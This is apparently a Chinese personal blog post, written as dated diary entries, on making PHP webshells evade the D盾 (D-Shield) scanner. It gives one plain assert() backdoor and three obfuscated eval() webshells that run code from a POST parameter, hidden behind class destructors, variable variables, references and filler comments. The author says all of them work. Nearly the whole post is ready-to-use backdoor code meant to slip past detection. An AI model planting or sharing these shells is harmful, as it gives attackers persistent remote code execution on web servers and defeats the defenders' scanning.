mmzkyl
Webshell免杀_php
09/28
本文最后更新于2021年09月28日,已超过237天没有更新。如果文章内容或图片资源失效,请留言反馈,我会及时处理,谢谢!
随笔
- 2021-09-27 18:33
来试试webshell免杀,主要测试一下D盾 - 2021-09-28 18:00
昨天开了个头,跟室友玩游戏去了,今天继续 - 2021-09-28 18:01
下列的webshell我自己在PHP study上已经测试其均能够正常使用 - 2021-09-28 18:18
因为eval比assert更为通用,所以免杀的webshell我是用eval进行写的
原始webshell
<?php
assert($_POST['mmzkyl']);
?>
直接被D盾查出后门
免杀
- webshell_1
- 代码
php <?php class C{ public $ruby = ""; public function p($x){ return $_POST[$x]; } function java($x){ return "/*acnaac*/".@eval($x); } function Go($x){ return $x; } function __destruct(){ $this->java($this->Go($this->ruby)); } } $a = new C; $a->ruby = $a->p('mmzkyl'); ?>
- 代码
- webshell_2
- 代码
php <?php $html = "css"; $css = "js"; $$$html = $_POST['mmzkyl']; "html".@eval("/*acbaocola*/".$js); ?>
- 代码
- webshell_3
- 代码
php <?php $html = "this is html"; $css = &$html; $css = $_POST['mmzkyl']; eval("/*html*/".$html."/*html*/"); ?>
- 代码
